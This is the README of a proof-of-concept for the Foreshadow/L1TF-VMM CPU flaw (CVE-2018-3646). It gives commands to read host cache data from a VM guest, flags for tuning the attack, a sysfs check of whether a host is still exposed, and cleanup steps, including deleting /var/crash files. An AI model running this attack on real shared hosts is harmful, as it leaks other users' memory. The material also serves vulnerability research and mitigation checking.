L1TF (Foreshadow) PoC -- read host's information from VM guest
Latest commit 0615b91 Oct 12, 2018



L1TF PoC: read host's information from VM guest

This is a PoC for L1TF-VMM (aka Foreshadow-VMM, CVE-2018-3646), which can be used to read any data residing in the host's L1 data cache from a guest VM. I used a kernel module to modify the target PTE, so the attack needs root inside the guest to load that module. Although this is not very advanced compared with a userspace-only approach, it works and is simpler. I wrote it just for fun. Currently it only works on x86_64.

My machine configuration:

Host:
  Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz, 8 cpus (1 socket * 4 cores * 2 threads),
  Ubuntu 18.04, Linux 4.15.0-29-generic,
  virt-manager 1.5.1

Guest:
  Intel Core Processor (Broadwell, no TSX, IBRS) (the CPU model QEMU presents to the guest), 8 cpus (8 sockets * 1 core * 1 thread),
  Ubuntu 18.04, Linux 4.15.0-29-generic

Reproduce attack

In host:

$ gcc -o victim victim.c && sudo ./victim

In guest (as root, since the attack loads a kernel module):

$ cd <path-to-L1TF-g2h>

$ sudo su

# time ./foreshadow <victim_phys_addr> <len>

<victim_phys_addr> is the host physical address of the victim's buffer and <len> is the number of bytes to read. A host physical address is needed rather than a guest one because L1TF makes the speculative load through a not-present guest PTE look up the L1D with the PTE's physical address directly, without going through EPT.

You can also watch my attack video and follow it step by step: https://www.youtube.com/watch?v=JpBIei7-naA
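Before following the steps above it is worth knowing whether the host still exposes the L1TF-VMM variant at all. The following shell script is an added example, not part of the L1TF-g2h repository: it reads the host kernel's L1TF status from sysfs and classifies it. It assumes the status strings documented in the kernel's L1TF admin guide, and that a missing sysfs entry means a kernel without the August 2018 L1TF patches (the 4.15.0-29 kernel listed above is such a kernel, so the file will be absent there). The sample status lines in the loop are constructed, not captured from a machine.

```shell
#!/bin/sh
# Added pre-flight check; not part of the L1TF-g2h repository.
# Reads the host kernel's L1TF status from sysfs and reports which L1TF-VMM
# variant is still open. Assumptions: the sysfs entry exists only on kernels
# that carry the L1TF patches, and the status strings follow the kernel's
# l1tf admin guide ("Mitigation: PTE Inversion; VMX: <flush mode>, SMT <state>").

L1TF_SYSFS=/sys/devices/system/cpu/vulnerabilities/l1tf

# l1tf_host_status: print the raw status line, or nothing if the entry is absent.
l1tf_host_status() {
    cat "$L1TF_SYSFS" 2>/dev/null || :
}

# l1tf_classify STATUS: map one status line to a short verdict:
#   unpatched-kernel    no sysfs entry: no PTE inversion, no L1D flush on VM entry
#   not-affected        CPU is not vulnerable
#   vulnerable          L1TF present, PTE inversion not applied
#   host-only           PTE inversion only; kvm_intel not loaded, VMX state unknown
#   vmm-no-flush        guests enter with an unflushed L1D (guest-to-host read works)
#   vmm-smt-vulnerable  L1D flushed on VM entry, but the sibling hyperthread can
#                       refill it while the guest runs (victim on the sibling works)
#   vmm-mitigated       L1D flushed and SMT disabled
#   vmm-not-required    EPT disabled or flush not necessary
#   unknown             anything else
l1tf_classify() {
    s=$(printf '%s' "$1")   # command substitution drops a trailing newline
    case "$s" in
        "")                                            echo unpatched-kernel ;;
        "Not affected")                                echo not-affected ;;
        "Vulnerable")                                  echo vulnerable ;;
        "Mitigation: PTE Inversion")                   echo host-only ;;
        *"VMX: EPT disabled"*|*"flush not necessary"*) echo vmm-not-required ;;
        *"VMX: vulnerable"*)                           echo vmm-no-flush ;;
        *"cache flushes, SMT vulnerable")              echo vmm-smt-vulnerable ;;
        *"cache flushes, SMT disabled")                echo vmm-mitigated ;;
        *)                                             echo unknown ;;
    esac
}

# l1tf_poc_can_work STATUS: return 0 when a guest can expect to read host L1D
# contents the way this PoC does, 1 otherwise.
l1tf_poc_can_work() {
    case "$(l1tf_classify "$1")" in
        unpatched-kernel|vulnerable|vmm-no-flush|vmm-smt-vulnerable) return 0 ;;
        *) return 1 ;;
    esac
}

# Constructed sample status lines (not captured from a real host), printed
# next to the verdict for the machine this script runs on.
for s in "" "Not affected" "Mitigation: PTE Inversion" \
         "Mitigation: PTE Inversion; VMX: vulnerable" \
         "Mitigation: PTE Inversion; VMX: conditional cache flushes, SMT vulnerable" \
         "Mitigation: PTE Inversion; VMX: cache flushes, SMT disabled"; do
    printf '%-78s -> %s\n' "'$s'" "$(l1tf_classify "$s")"
done
status=$(l1tf_host_status)
printf 'this host: %s -> %s\n' "'$status'" "$(l1tf_classify "$status")"
```

Run it on the host, not in the guest: the guest's own sysfs entry describes the virtual CPU and says nothing about whether the hypervisor flushes the L1D or leaves the sibling hyperthread free for a host process. The "vmm-smt-vulnerable" verdict is the one that matters for this PoC's setup, where the victim is a host process scheduled next to the attacking vCPU.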


If you interrupt the attack with CTRL+C (better not to), you have to remove the restorePTE.ko module manually before you can start another attack. Occasionally this hangs the VM because of "*ptep = bak;" in mod_exit(void); if that happens, just restart the VM. The page gives the rmmod command with a different module name than the .ko file above, so check the loaded name with lsmod first:

# lsmod | grep -i pte
# rmmod replacePTE

If you want the victim to run on all CPU cores, add -DALL_CPUS to the compile flags (gcc -DALL_CPUS -o victim victim.c). The guest can only read what sits in the L1D of the physical core it is running on, so the victim's data has to be on that core (in practice, on its sibling hyperthread); running the victim on every core removes the need to pin it.

If you don't want to keep retrying a byte that failed to read, remove -DKEEP from CFLAGS in the Makefile.

The annoying "System program problem detected" box is Ubuntu's apport reporting the crash files the attack leaves behind; you can simply get rid of it with:

# rm -f /var/crash/*